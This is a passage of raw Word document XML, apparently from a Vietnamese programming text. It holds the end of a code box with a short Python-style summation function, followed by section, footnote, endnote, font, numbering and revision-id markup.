            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t>x = pow(2,i-2) * post_dict[i]</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="008B3D7D" w:rsidRPr="008B3D7D" w:rsidRDefault="008B3D7D" w:rsidP="008B3D7D">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t>s = s+x</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="008B3D7D" w:rsidRPr="008B3D7D" w:rsidRDefault="008B3D7D" w:rsidP="008B3D7D">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t>return (s)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="008B3D7D" w:rsidRPr="008B3D7D" w:rsidRDefault="008B3D7D" w:rsidP="008B3D7D">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="008B3D7D">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p w:rsidR="008B3D7D" w:rsidRDefault="008B3D7D" w:rsidP="008B3D7D">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
              <w:rPr>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="008B3D7D" w:rsidRPr="008B3D7D" w:rsidRDefault="008B3D7D" w:rsidP="008B3D7D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="008B3D7D" w:rsidRPr="008B3D7D" w:rsidSect="00A20A30">
      <w:type w:val="continuous"/>
      <w:pgSz w:w="11907" w:h="16840" w:code="9"/>
      <w:pgMar w:top="1701" w:right="1134" w:bottom="1701" w:left="1701" w:header="0" w:footer="72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25" w:rsidRDefault="00033D25">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00033D25" w:rsidRDefault="00033D25"/>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00033D25" w:rsidRDefault="00033D25">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:continuationSeparator/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00033D25" w:rsidRDefault="0003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Malgun Gothic Semilight"/>
    <w:charset w:val="80"/>
    <w:family w:val="swiss"/>
    <w:pitch w:val="variable"/>
    <w:sig w:usb0="00000000" w:usb1="2BDFFCFB" w:usb2="00000036" w:usb3="00000000" w:csb0="003F01FF" w:csb1="00000000"/>
  </w:font>
  <w:font w:name="Liberation Sans">
    <w:altName w:val="Arial"/>
    <w:charset w:val="00"/>
    <w:family w:val="swiss"/>
    <w:pitch w:val="variable"/>
    <w:sig w:usb0="00000001" w:usb1="500078FB" w:usb2="00000000" w:usb3="00000000" w:csb0="0000009F" w:csb1="00000000"/>
  </w:font>
  <w:font w:name="FreeSans">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8476"/>
      <w:docPartObj>
        <w:docPartGallery w:val="Page Numbers (Bottom of Page)"/>
        <w:docPartUnique/>
      </w:docPartObj>
    </w:sdtPr>
    <w:sdtEndPr>
      <w:rPr>
        <w:noProof/>
      </w:rPr>
    </w:sdtEndPr>
    <w:sdtContent>
      <w:p w:rsidR="001E10B4" w:rsidRDefault="001E10B4">
        <w:pPr>
          <w:pStyle w:val="Footer"/>
          <w:jc w:val="right"/>
        </w:pPr>
        <w:r>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:instrText xml:space="preserve"> PAGE   \* MERGEFORMAT </w:instrText>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00F86F13">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>83</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:p>
    </w:sdtContent>
  </w:sdt>
  <w:p w:rsidR="001E10B4" w:rsidRDefault="001E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25" w:rsidRDefault="00033D25">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00033D25" w:rsidRDefault="00033D25"/>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00033D25" w:rsidRDefault="00033D25">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:continuationSeparator/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00033D25" w:rsidRDefault="00033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B4" w:rsidRDefault="001E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FCE"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D3D63CF4"/>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C25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41DF3"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3FB6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75F90"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C26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121ED"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="943EA5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B9B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D6BA9"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="1E12E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11A9"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="8BD02F2A"/>
    <w:lvl w:ilvl="0" w:tplc="A3B01D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54217"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="63E2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65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E5B68"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F066F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C3333EF"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="EF3A4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25201"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D3D63CF4"/>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9B15360"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D3D63CF4"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>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Restart w:val="0"/>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E3A3F90"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7876A56E"/>
    <w:lvl w:ilvl="0" w:tplc="A3B01D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C0AEE"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F348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E3884"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="BDC4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FA4CF4"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="CDA6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F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B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95E61"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D83C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A63D56"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7EC8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05F1F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3180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F614B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7604FB44"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="2"/>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5867217"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="5594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8A437C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="44DE7E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4"/>
  </w:num>
  <w:num w:numId="5">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="6">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="7">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="8">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="9">
    <w:abstractNumId w:val="24"/>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8"/>
  </w:num>
  <w:num w:numId="16">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="17">
    <w:abstractNumId w:val="21"/>
  </w:num>
  <w:num w:numId="18">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="19">
    <w:abstractNumId w:val="2"/>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13"/>
  </w:num>
  <w:num w:numId="34">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="35">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="36">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="37">
    <w:abstractNumId w:val="17"/>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667B"/>
    <w:rsid w:val="000002DA"/>
    <w:rsid w:val="000018BD"/>
    <w:rsid w:val="00004A70"/>
    <w:rsid w:val="00010F89"/>
    <w:rsid w:val="00016508"/>
    <w:rsid w:val="0002676F"/>
    <w:rsid w:val="00033D25"/>
    <w:rsid w:val="00044C19"/>
    <w:rsid w:val="000512EB"/>
    <w:rsid w:val="00060689"/>
    <w:rsid w:val="00060E03"/>
    <w:rsid w:val="000679B7"/>
    <w:rsid w:val="0007360D"/>
    <w:rsid w:val="00074812"/>
    <w:rsid w:val="00075263"/>
    <w:rsid w:val="0008594E"/>
    <w:rsid w:val="00090566"/>
    <w:rsid w:val="00091C83"/>
    <w:rsid w:val="0009792B"/>
    <w:rsid w:val="000A2289"/>
    <w:rsid w:val="000A3157"/>
    <w:rsid w:val="000A4959"/>
    <w:rsid w:val="000A795D"/>
    <w:rsid w:val="000B0F4B"/>
    <w:rsid w:val="000B2616"/>
    <w:rsid w:val="000B5547"/>
    <w:rsid w:val="000B5CFF"/>
    <w:rsid w:val="000C4895"/>
    <w:rsid w:val="000C73CB"/>
    <w:rsid w:val="000E464A"/>
    <w:rsid w:val="000E500A"/>
    <w:rsid w:val="000F3A0F"/>
    <w:rsid w:val="000F595C"/>
    <w:rsid w:val="001067FE"/>
    <w:rsid w:val="00112DBF"/>
    <w:rsid w:val="001140CD"/>
    <w:rsid w:val="00126AF3"/>
    <w:rsid w:val="001359BE"/>
    <w:rsid w:val="00141CBB"/>
    <w:rsid w:val="00144329"/>
    <w:rsid w:val="0014540A"/>
    <w:rsid w:val="00161298"/>
    <w:rsid w:val="0016449D"/>
    <w:rsid w:val="00166079"/>
    <w:rsid w:val="0018283E"/>
    <w:rsid w:val="00185184"/>
    <w:rsid w:val="00187A14"/>
    <w:rsid w:val="00194A77"/>
    <w:rsid w:val="00195EED"/>
    <w:rsid w:val="001A044F"/>
    <w:rsid w:val="001A4F73"/>
    <w:rsid w:val="001A6BDC"/>
    <w:rsid w:val="001B004F"/>
    <w:rsid w:val="001B68FE"/>
    <w:rsid w:val="001C1682"/>
    <w:rsid w:val="001C221C"/>
    <w:rsid w:val="001C48BA"/>
    <w:rsid w:val="001D22C4"/>
    <w:rsid w:val="001D665C"/>
    <w:rsid w:val="001D7BA6"/>
    <w:rsid w:val="001E10B4"/>
    <w:rsid w:val="001E45E1"/>
    <w:rsid w:val="001F366C"/>
    <w:rsid w:val="001F5EAC"/>
    <w:rsid w:val="001F7160"/>
    <w:rsid w:val="001F7343"/>
    <w:rsid w:val="00203635"/>
    <w:rsid w:val="00207DB9"/>
    <w:rsid w:val="00217848"/>
    <w:rsid w:val="00227CCB"/>
    <w:rsid w:val="0024706B"/>
    <w:rsid w:val="0025031B"/>
    <w:rsid w:val="00254900"/>
    <w:rsid w:val="00254DE4"/>
    <w:rsid w:val="00261C96"/>
    <w:rsid w:val="00273A9E"/>
    <w:rsid w:val="002906A4"/>
    <w:rsid w:val="002A14DE"/>
    <w:rsid w:val="002A53D9"/>
    <w:rsid w:val="002B02EF"/>
    <w:rsid w:val="002B0849"/>
    <w:rsid w:val="002C12C7"/>
    <w:rsid w:val="002C2C35"/>
    <w:rsid w:val="002C6428"/>
    <w:rsid w:val="002C773D"/>
    <w:rsid w:val="002D3C6B"/>
    <w:rsid w:val="002D42D8"/>
    <w:rsid w:val="002D681D"/>
    <w:rsid w:val="002E332A"/>
    <w:rsid w:val="002E37B1"/>
    <w:rsid w:val="002E5E1B"/>
    <w:rsid w:val="002F2131"/>
    <w:rsid w:val="002F53E1"/>
    <w:rsid w:val="003006E8"/>
    <w:rsid w:val="00300F28"/>
    <w:rsid w:val="0030524E"/>
    <w:rsid w:val="00305840"/>
    <w:rsid w:val="00305F5A"/>
    <w:rsid w:val="00307A9D"/>
    <w:rsid w:val="00313D3F"/>
    <w:rsid w:val="00317EAB"/>
    <w:rsid w:val="00320504"/>
    <w:rsid w:val="00323CAC"/>
    <w:rsid w:val="00325E74"/>
    <w:rsid w:val="003263E0"/>
    <w:rsid w:val="003308DA"/>
    <w:rsid w:val="0033595B"/>
    <w:rsid w:val="003406A0"/>
    <w:rsid w:val="0034368E"/>
    <w:rsid w:val="003451D0"/>
    <w:rsid w:val="0034667B"/>
    <w:rsid w:val="00346AC0"/>
    <w:rsid w:val="003479FE"/>
    <w:rsid w:val="00350793"/>
    <w:rsid w:val="00355955"/>
    <w:rsid w:val="00357C7D"/>
    <w:rsid w:val="003633C3"/>
    <w:rsid w:val="00364B0A"/>
    <w:rsid w:val="00366A23"/>
    <w:rsid w:val="003856C8"/>
    <w:rsid w:val="00385BFD"/>
    <w:rsid w:val="003910E7"/>
    <w:rsid w:val="00391D73"/>
    <w:rsid w:val="00392353"/>
    <w:rsid w:val="003A14BC"/>
    <w:rsid w:val="003A1ADF"/>
    <w:rsid w:val="003A3F0E"/>
    <w:rsid w:val="003A6E53"/>
    <w:rsid w:val="003B1940"/>
    <w:rsid w:val="003B4696"/>
    <w:rsid w:val="003B5F5D"/>
    <w:rsid w:val="003B615C"/>
    <w:rsid w:val="003B6416"/>
    <w:rsid w:val="003B7403"/>
    <w:rsid w:val="003B78B9"/>
    <w:rsid w:val="003C6691"/>
    <w:rsid w:val="003C748B"/>
    <w:rsid w:val="003D0410"/>
    <w:rsid w:val="003D3A27"/>
    <w:rsid w:val="003E0ED1"/>
    <w:rsid w:val="003E1679"/>
    <w:rsid w:val="003E2412"/>
    <w:rsid w:val="003E593C"/>
    <w:rsid w:val="003E7AA8"/>
    <w:rsid w:val="003F2ACD"/>
    <w:rsid w:val="003F7098"/>
    <w:rsid w:val="004046D2"/>
    <w:rsid w:val="00404F02"/>
    <w:rsid w:val="004064FA"/>
    <w:rsid w:val="00410F30"/>
    <w:rsid w:val="00412534"/>
    <w:rsid w:val="00416450"/>
    <w:rsid w:val="004415A7"/>
    <w:rsid w:val="00446F93"/>
    <w:rsid w:val="00455D2B"/>
    <w:rsid w:val="004571CD"/>
    <w:rsid w:val="004601D9"/>
    <w:rsid w:val="00470368"/>
    <w:rsid w:val="00476C6C"/>
    <w:rsid w:val="00482873"/>
    <w:rsid w:val="004A153F"/>
    <w:rsid w:val="004A16AC"/>
    <w:rsid w:val="004A2A62"/>
    <w:rsid w:val="004A74B6"/>
    <w:rsid w:val="004B4347"/>
    <w:rsid w:val="004C204C"/>
    <w:rsid w:val="004C4D20"/>
    <w:rsid w:val="004C4D4F"/>
    <w:rsid w:val="004D1E53"/>
    <w:rsid w:val="004D66E3"/>
    <w:rsid w:val="004D72F3"/>
    <w:rsid w:val="004E19C9"/>
    <w:rsid w:val="004E23D1"/>
    <w:rsid w:val="004E7ED7"/>
    <w:rsid w:val="004F36FB"/>
    <w:rsid w:val="004F5035"/>
    <w:rsid w:val="004F69FA"/>
    <w:rsid w:val="005010FD"/>
    <w:rsid w:val="00501C5D"/>
    <w:rsid w:val="00503901"/>
    <w:rsid w:val="00511280"/>
    <w:rsid w:val="00520B88"/>
    <w:rsid w:val="00521EC1"/>
    <w:rsid w:val="005221BA"/>
    <w:rsid w:val="0053363C"/>
    <w:rsid w:val="00536779"/>
    <w:rsid w:val="00536EBF"/>
    <w:rsid w:val="00541FE4"/>
    <w:rsid w:val="00542B40"/>
    <w:rsid w:val="005447AB"/>
    <w:rsid w:val="0055027C"/>
    <w:rsid w:val="00550B65"/>
    <w:rsid w:val="00555378"/>
    <w:rsid w:val="00555D31"/>
    <w:rsid w:val="00561A8B"/>
    <w:rsid w:val="00562C45"/>
    <w:rsid w:val="00562F29"/>
    <w:rsid w:val="00565584"/>
    <w:rsid w:val="00566767"/>
    <w:rsid w:val="00570A7A"/>
    <w:rsid w:val="00571796"/>
    <w:rsid w:val="0058383C"/>
    <w:rsid w:val="00586AE9"/>
    <w:rsid w:val="00587B19"/>
    <w:rsid w:val="00592B4D"/>
    <w:rsid w:val="005A151D"/>
    <w:rsid w:val="005A6327"/>
    <w:rsid w:val="005B031B"/>
    <w:rsid w:val="005B135A"/>
    <w:rsid w:val="005B29B5"/>
    <w:rsid w:val="005B4A41"/>
    <w:rsid w:val="005B6AC4"/>
    <w:rsid w:val="005C6F7D"/>
    <w:rsid w:val="005D256F"/>
    <w:rsid w:val="005D3C52"/>
    <w:rsid w:val="005E495B"/>
    <w:rsid w:val="005E4E83"/>
    <w:rsid w:val="005E6ECB"/>
    <w:rsid w:val="005E7228"/>
    <w:rsid w:val="005F0F2A"/>
    <w:rsid w:val="005F3F37"/>
    <w:rsid w:val="005F5912"/>
    <w:rsid w:val="005F7946"/>
    <w:rsid w:val="00602B3A"/>
    <w:rsid w:val="00603AE9"/>
    <w:rsid w:val="0060415D"/>
    <w:rsid w:val="00610D75"/>
    <w:rsid w:val="00612934"/>
    <w:rsid w:val="00614D66"/>
    <w:rsid w:val="00617466"/>
    <w:rsid w:val="00621DB2"/>
    <w:rsid w:val="006278D8"/>
    <w:rsid w:val="00642451"/>
    <w:rsid w:val="00643484"/>
    <w:rsid w:val="00650956"/>
    <w:rsid w:val="00653863"/>
    <w:rsid w:val="00656FC6"/>
    <w:rsid w:val="00662FE1"/>
    <w:rsid w:val="006674E2"/>
    <w:rsid w:val="00673CE2"/>
    <w:rsid w:val="006957A4"/>
    <w:rsid w:val="006A00C0"/>
    <w:rsid w:val="006A2294"/>
    <w:rsid w:val="006A3400"/>
    <w:rsid w:val="006A67F5"/>
    <w:rsid w:val="006A79EF"/>
    <w:rsid w:val="006B1F99"/>
    <w:rsid w:val="006B2163"/>
    <w:rsid w:val="006C1938"/>
    <w:rsid w:val="006C3FBD"/>
    <w:rsid w:val="006C45B8"/>
    <w:rsid w:val="006D6505"/>
    <w:rsid w:val="006D6FC6"/>
    <w:rsid w:val="006E25A7"/>
    <w:rsid w:val="006F4913"/>
    <w:rsid w:val="006F59E3"/>
    <w:rsid w:val="00724DBD"/>
    <w:rsid w:val="0073015D"/>
    <w:rsid w:val="00731E3A"/>
    <w:rsid w:val="00735E19"/>
    <w:rsid w:val="00736345"/>
    <w:rsid w:val="007522E7"/>
    <w:rsid w:val="00754364"/>
    <w:rsid w:val="00756590"/>
    <w:rsid w:val="00757273"/>
    <w:rsid w:val="00760373"/>
    <w:rsid w:val="00763A7E"/>
    <w:rsid w:val="00765278"/>
    <w:rsid w:val="007700D0"/>
    <w:rsid w:val="00776D95"/>
    <w:rsid w:val="00781B18"/>
    <w:rsid w:val="007874C9"/>
    <w:rsid w:val="00797E7B"/>
    <w:rsid w:val="007A47EB"/>
    <w:rsid w:val="007B258A"/>
    <w:rsid w:val="007C6B6B"/>
    <w:rsid w:val="007D081B"/>
    <w:rsid w:val="007D72F3"/>
    <w:rsid w:val="007E66F1"/>
    <w:rsid w:val="007F0DDD"/>
    <w:rsid w:val="007F0E35"/>
    <w:rsid w:val="007F2BF6"/>
    <w:rsid w:val="007F31C4"/>
    <w:rsid w:val="007F4307"/>
    <w:rsid w:val="007F758F"/>
    <w:rsid w:val="00800AAF"/>
    <w:rsid w:val="00804310"/>
    <w:rsid w:val="0080610C"/>
    <w:rsid w:val="00815231"/>
    <w:rsid w:val="008313DA"/>
    <w:rsid w:val="00835F18"/>
    <w:rsid w:val="00840304"/>
    <w:rsid w:val="00843C00"/>
    <w:rsid w:val="00851221"/>
    <w:rsid w:val="008525C3"/>
    <w:rsid w:val="008673FF"/>
    <w:rsid w:val="008724FC"/>
    <w:rsid w:val="00872F45"/>
    <w:rsid w:val="00873D9D"/>
    <w:rsid w:val="00876FFE"/>
    <w:rsid w:val="00891990"/>
    <w:rsid w:val="008A5E05"/>
    <w:rsid w:val="008B3D7D"/>
    <w:rsid w:val="008C1C90"/>
    <w:rsid w:val="008C75CB"/>
    <w:rsid w:val="008E1FF3"/>
    <w:rsid w:val="008E3B8D"/>
    <w:rsid w:val="008E4486"/>
    <w:rsid w:val="008F0721"/>
    <w:rsid w:val="008F328A"/>
    <w:rsid w:val="008F573F"/>
    <w:rsid w:val="008F7562"/>
    <w:rsid w:val="0090349F"/>
    <w:rsid w:val="009147F6"/>
    <w:rsid w:val="009201E8"/>
    <w:rsid w:val="00922FC1"/>
    <w:rsid w:val="009313E1"/>
    <w:rsid w:val="00934855"/>
    <w:rsid w:val="009374A3"/>
    <w:rsid w:val="00937B10"/>
    <w:rsid w:val="0094116B"/>
    <w:rsid w:val="00942DF4"/>
    <w:rsid w:val="00945280"/>
    <w:rsid w:val="00947D85"/>
    <w:rsid w:val="00954BB3"/>
    <w:rsid w:val="00962CE7"/>
    <w:rsid w:val="0097206B"/>
    <w:rsid w:val="009733F8"/>
    <w:rsid w:val="0097355B"/>
    <w:rsid w:val="009739B7"/>
    <w:rsid w:val="00973F77"/>
    <w:rsid w:val="00974C72"/>
    <w:rsid w:val="00974F49"/>
    <w:rsid w:val="00986F22"/>
    <w:rsid w:val="009A0CAF"/>
    <w:rsid w:val="009A5006"/>
    <w:rsid w:val="009A7430"/>
    <w:rsid w:val="009B1AC7"/>
    <w:rsid w:val="009B4478"/>
    <w:rsid w:val="009B48A0"/>
    <w:rsid w:val="009B4DE2"/>
    <w:rsid w:val="009C08A2"/>
    <w:rsid w:val="009C3FFE"/>
    <w:rsid w:val="009C7A9D"/>
    <w:rsid w:val="009D7A01"/>
    <w:rsid w:val="009F090B"/>
    <w:rsid w:val="009F49FE"/>
    <w:rsid w:val="009F6601"/>
    <w:rsid w:val="009F6DCD"/>
    <w:rsid w:val="00A041A4"/>
    <w:rsid w:val="00A13901"/>
    <w:rsid w:val="00A20A30"/>
    <w:rsid w:val="00A23DF1"/>
    <w:rsid w:val="00A25AB0"/>
    <w:rsid w:val="00A30F88"/>
    <w:rsid w:val="00A31F57"/>
    <w:rsid w:val="00A3488B"/>
    <w:rsid w:val="00A409E0"/>
    <w:rsid w:val="00A42212"/>
    <w:rsid w:val="00A47856"/>
    <w:rsid w:val="00A5726C"/>
    <w:rsid w:val="00A642F1"/>
    <w:rsid w:val="00A65033"/>
    <w:rsid w:val="00A65A26"/>
    <w:rsid w:val="00A675EA"/>
    <w:rsid w:val="00A6793E"/>
    <w:rsid w:val="00A706C3"/>
    <w:rsid w:val="00A74FA1"/>
    <w:rsid w:val="00A8166F"/>
    <w:rsid w:val="00A82306"/>
    <w:rsid w:val="00A909F8"/>
    <w:rsid w:val="00A970BE"/>
    <w:rsid w:val="00AB5C7E"/>
    <w:rsid w:val="00AC0899"/>
    <w:rsid w:val="00AC7401"/>
    <w:rsid w:val="00AD2AED"/>
    <w:rsid w:val="00AD419D"/>
    <w:rsid w:val="00AD4AA4"/>
    <w:rsid w:val="00AE522C"/>
    <w:rsid w:val="00AE61AE"/>
    <w:rsid w:val="00AF144B"/>
    <w:rsid w:val="00AF34FB"/>
    <w:rsid w:val="00AF6183"/>
    <w:rsid w:val="00B00A0E"/>
    <w:rsid w:val="00B00EED"/>
    <w:rsid w:val="00B02A8B"/>
    <w:rsid w:val="00B03EBA"/>
    <w:rsid w:val="00B05040"/>
    <w:rsid w:val="00B10C08"/>
    <w:rsid w:val="00B1103E"/>
    <w:rsid w:val="00B1521D"/>
    <w:rsid w:val="00B16D8E"/>
    <w:rsid w:val="00B24BF4"/>
    <w:rsid w:val="00B30B22"/>
    <w:rsid w:val="00B3259C"/>
    <w:rsid w:val="00B3299C"/>
    <w:rsid w:val="00B32ABA"/>
    <w:rsid w:val="00B33ABE"/>
    <w:rsid w:val="00B35184"/>
    <w:rsid w:val="00B40E52"/>
    <w:rsid w:val="00B4125E"/>
    <w:rsid w:val="00B425FC"/>
    <w:rsid w:val="00B479CD"/>
    <w:rsid w:val="00B5658E"/>
    <w:rsid w:val="00B649B0"/>
    <w:rsid w:val="00B70950"/>
    <w:rsid w:val="00B73288"/>
    <w:rsid w:val="00B748EF"/>
    <w:rsid w:val="00B82BEB"/>
    <w:rsid w:val="00B92936"/>
    <w:rsid w:val="00B93CAD"/>
    <w:rsid w:val="00B97F3E"/>
    <w:rsid w:val="00BA000F"/>
    <w:rsid w:val="00BA05F2"/>
    <w:rsid w:val="00BA2AA9"/>
    <w:rsid w:val="00BA74A3"/>
    <w:rsid w:val="00BB2579"/>
    <w:rsid w:val="00BB59F4"/>
    <w:rsid w:val="00BB7938"/>
    <w:rsid w:val="00BE2A5E"/>
    <w:rsid w:val="00BE5176"/>
    <w:rsid w:val="00BF48D5"/>
    <w:rsid w:val="00BF58E1"/>
    <w:rsid w:val="00BF78DE"/>
    <w:rsid w:val="00C04765"/>
    <w:rsid w:val="00C10140"/>
    <w:rsid w:val="00C16B7F"/>
    <w:rsid w:val="00C208E1"/>
    <w:rsid w:val="00C2633E"/>
    <w:rsid w:val="00C3317E"/>
    <w:rsid w:val="00C332BA"/>
    <w:rsid w:val="00C37E54"/>
    <w:rsid w:val="00C40E72"/>
    <w:rsid w:val="00C43364"/>
    <w:rsid w:val="00C60B75"/>
    <w:rsid w:val="00C6218F"/>
    <w:rsid w:val="00C93A9C"/>
    <w:rsid w:val="00C94B63"/>
    <w:rsid w:val="00CA2D9F"/>
    <w:rsid w:val="00CA4181"/>
    <w:rsid w:val="00CB01FC"/>
    <w:rsid w:val="00CB36A9"/>
    <w:rsid w:val="00CB53C6"/>
    <w:rsid w:val="00CC08BB"/>
    <w:rsid w:val="00CC2399"/>
    <w:rsid w:val="00CC2642"/>
    <w:rsid w:val="00CC78E5"/>
    <w:rsid w:val="00CD0DD2"/>
    <w:rsid w:val="00CD230E"/>
    <w:rsid w:val="00CD259A"/>
    <w:rsid w:val="00CD584F"/>
    <w:rsid w:val="00CE3969"/>
    <w:rsid w:val="00CE5824"/>
    <w:rsid w:val="00CF6A85"/>
    <w:rsid w:val="00D03A35"/>
    <w:rsid w:val="00D04636"/>
    <w:rsid w:val="00D10288"/>
    <w:rsid w:val="00D14C13"/>
    <w:rsid w:val="00D16775"/>
    <w:rsid w:val="00D21755"/>
    <w:rsid w:val="00D2208A"/>
    <w:rsid w:val="00D33E86"/>
    <w:rsid w:val="00D537D9"/>
    <w:rsid w:val="00D53D34"/>
    <w:rsid w:val="00D55C73"/>
    <w:rsid w:val="00D655B3"/>
    <w:rsid w:val="00D707EC"/>
    <w:rsid w:val="00D71068"/>
    <w:rsid w:val="00D7567B"/>
    <w:rsid w:val="00D865CB"/>
    <w:rsid w:val="00D916C0"/>
    <w:rsid w:val="00D934A1"/>
    <w:rsid w:val="00DA0438"/>
    <w:rsid w:val="00DA163E"/>
    <w:rsid w:val="00DB3DB2"/>
    <w:rsid w:val="00DB46AA"/>
    <w:rsid w:val="00DB4D2D"/>
    <w:rsid w:val="00DB7B2D"/>
    <w:rsid w:val="00DC4A3A"/>
    <w:rsid w:val="00DC7CF9"/>
    <w:rsid w:val="00DD02BD"/>
    <w:rsid w:val="00DD2BF4"/>
    <w:rsid w:val="00DD5535"/>
    <w:rsid w:val="00DD5B0D"/>
    <w:rsid w:val="00DD5CC1"/>
    <w:rsid w:val="00DE462E"/>
    <w:rsid w:val="00DE7D2F"/>
    <w:rsid w:val="00DF6A89"/>
    <w:rsid w:val="00E0760C"/>
    <w:rsid w:val="00E14CFD"/>
    <w:rsid w:val="00E22E58"/>
    <w:rsid w:val="00E2762E"/>
    <w:rsid w:val="00E43594"/>
    <w:rsid w:val="00E46E7F"/>
    <w:rsid w:val="00E54D96"/>
    <w:rsid w:val="00E56B71"/>
    <w:rsid w:val="00E64461"/>
    <w:rsid w:val="00E644EE"/>
    <w:rsid w:val="00E665FA"/>
    <w:rsid w:val="00E66620"/>
    <w:rsid w:val="00E72392"/>
    <w:rsid w:val="00E730B8"/>
    <w:rsid w:val="00E7327E"/>
    <w:rsid w:val="00E7608A"/>
    <w:rsid w:val="00E921F1"/>
    <w:rsid w:val="00E93309"/>
    <w:rsid w:val="00E955AF"/>
    <w:rsid w:val="00EA37D2"/>
    <w:rsid w:val="00EB02CD"/>
    <w:rsid w:val="00EB0F6B"/>
    <w:rsid w:val="00EB1EB3"/>
    <w:rsid w:val="00EE08FC"/>
    <w:rsid w:val="00EE2381"/>
    <w:rsid w:val="00EE4B21"/>
    <w:rsid w:val="00EE5E6C"/>
    <w:rsid w:val="00EF433B"/>
    <w:rsid w:val="00F022BA"/>
    <w:rsid w:val="00F227C7"/>
    <w:rsid w:val="00F37E33"/>
    <w:rsid w:val="00F441F2"/>
    <w:rsid w:val="00F45E2E"/>
    <w:rsid w:val="00F5471C"/>
    <w:rsid w:val="00F54753"/>
    <w:rsid w:val="00F54E50"/>
    <w:rsid w:val="00F67265"/>
    <w:rsid w:val="00F679BF"/>
    <w:rsid w:val="00F71BCB"/>
    <w:rsid w:val="00F7715B"/>
    <w:rsid w:val="00F84439"/>
    <w:rsid w:val="00F855C6"/>
    <w:rsid w:val="00F86F13"/>
    <w:rsid w:val="00F92F00"/>
    <w:rsid w:val="00F96CE5"/>
    <w:rsid w:val="00F97590"/>
    <w:rsid w:val="00FB590B"/>
    <w:rsid w:val="00FB61E3"/>
    <w:rsid w:val="00FB7CA3"/>
